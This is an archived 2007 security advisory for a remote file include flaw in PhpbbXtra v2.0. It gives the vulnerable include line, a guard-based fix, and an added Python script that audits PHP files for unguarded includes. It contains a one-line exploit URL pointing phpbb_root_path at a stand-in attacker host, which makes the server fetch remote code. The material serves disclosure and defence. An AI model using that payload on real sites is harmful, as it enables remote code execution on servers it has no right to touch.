PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

CVE: N/A
Category: CWE-94
Price: N/A
Severity: High
Author: N/A
Risk: High
Exploitation Type: Remote
Date: 2007-01-05
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006120133

Below is a copy:

-----------------------------------------------

PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

-----------------------------------------------

Author: xoron

-----------------------------------------------
 
Vuln Code: include($phpbb_root_path . 'includes/bbcode.'.$phpEx);

-----------------------------------------------

F!X:

- open the file /includes/archive/archive_topic.php

- insert this code before the vulnerable code

if ( !defined('IN_PHPBB') )
{
    die('Hacking attempt');
}

- save and exit

-----------------------------------------------

exploit:

http://www.[target].com/[script_path]/includes/archive/archive_topic.php
?phpbb_root_path=http://evil_scripts ?

-----------------------------------------------

download:http://sourceforge.net/project/showfiles.php?group_id=152219

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
-       Happy Eid al-Adha in advance to all Muslims       -
-                                                         -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-25]
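
The fix above only helps if every directly reachable file tests IN_PHPBB before it includes anything through $phpbb_root_path. The Python audit below is an added example, not part of the original advisory or the PhpbbXtra code base; it flags include/require statements that use $phpbb_root_path with no guard or local assignment before them. The function names and the sample source are constructed for illustration, and the exemption for files that assign the variable themselves assumes phpBB-style entry scripts.

```python
import re
import sys
from pathlib import Path

# include/require whose path starts with $phpbb_root_path (the advisory's pattern)
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*\$phpbb_root_path\b", re.I)
# The guard from the fix: a defined('IN_PHPBB') test
GUARD_RE = re.compile(r"defined\s*\(\s*['\"]IN_PHPBB['\"]\s*\)", re.I)
# Entry scripts set the variable themselves, e.g. $phpbb_root_path = './';
ASSIGN_RE = re.compile(r"\$phpbb_root_path\s*=(?!=)")
# String literals are matched first so '//' or '#' inside them is not a comment
TOKEN_RE = re.compile(
    r"""'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"|/\*.*?\*/|//[^\n]*|\#[^\n]*""", re.S)


def blank_comments(src):
    """Replace PHP comments with spaces, keeping strings and line numbers."""
    def repl(m):
        tok = m.group(0)
        return tok if tok[0] in "'\"" else re.sub(r"[^\n]", " ", tok)
    return TOKEN_RE.sub(repl, src)


def audit(src):
    """Return (line_no, statement) for each include of $phpbb_root_path that is
    preceded by neither the IN_PHPBB guard nor a local assignment.
    Textual order only: it does not prove the guard actually halts execution."""
    code = blank_comments(src)
    lines = code.splitlines()
    findings = []
    for m in INCLUDE_RE.finditer(code):
        before = code[:m.start()]
        if GUARD_RE.search(before) or ASSIGN_RE.search(before):
            continue
        line_no = before.count("\n") + 1
        findings.append((line_no, lines[line_no - 1].strip()))
    return findings


# Constructed sample: the advisory's vulnerable line with the guard commented out
SAMPLE = """<?php
# if ( !defined('IN_PHPBB') ) die('Hacking attempt');
include($phpbb_root_path . 'includes/bbcode.'.$phpEx);
"""

if __name__ == "__main__":
    print("sample:", audit(SAMPLE))
    for path in Path(sys.argv[1] if len(sys.argv) > 1 else ".").rglob("*.php"):
        for line_no, stmt in audit(path.read_text(errors="replace")):
            print(f"{path}:{line_no}: {stmt}")
```

Run it with the forum's root directory as the only argument; each hit is a file to review by hand, since the check is purely textual.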
